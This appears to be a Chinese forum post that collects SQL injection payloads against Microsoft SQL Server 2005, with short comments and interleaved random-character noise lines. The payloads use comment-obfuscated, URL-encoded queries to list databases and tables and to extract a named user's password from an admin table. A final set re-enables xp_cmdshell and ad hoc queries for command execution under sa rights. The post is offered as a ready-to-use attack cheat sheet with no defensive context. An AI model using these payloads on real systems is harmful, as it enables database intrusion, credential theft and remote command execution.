MSsql2005注入语句

admin

" r7 E' k7 b6 ~: P; m
+ e( o. T. t# T+ g: y( I
[Copy to clipboard]CODE:
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
- f& E) |2 n2 H  h
爆表语句,somedb部份是所要列的数据库，红色数字1累加

; _7 ]0 O. P! B% ^# N) ?0 k) W
3 g" ]  j: i- A) A' q: ], F4 H[Copy to clipboard]CODE:
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--

9 i, E' z# T# v9 B) _爆字段语句，爆表admin里user='icerover'的密码段

, F! v9 O: j; p  P: f* {
[Copy to clipboard]CODE:
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
9 m2 I# G6 Y. D$ W6 Z, [7 ^
mssql2005默认没有开xp_cmdshell的，openrowset也不能用
如果是sa权限，可以这样来开启
) o. [& J' [# o8 K! v. G9 D+ t开启openrowset
+ z9 |& Y* z: ^; n2 f
3 H6 z0 q4 i2 m& c* t: s8 L
) E( m, ^; R/ p. E( _- O[Copy to clipboard]CODE:
( n, B/ C* q& H/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
% d4 Y# Q, p+ ^8 z3 X! A" c7 ?
开启xp_cmdshell
$ O3 |/ M$ j9 D: `
6 O% ]. ]8 K/ j9 T7 K& Q5 f
# s8 _4 }& o2 y8 o% y/ d[Copy to clipboard]CODE:
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
' R$ V7 U$ Y* ?6 B8 ~: pEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
1 ]6 x4 q" r! V* d
ok,over~~晚安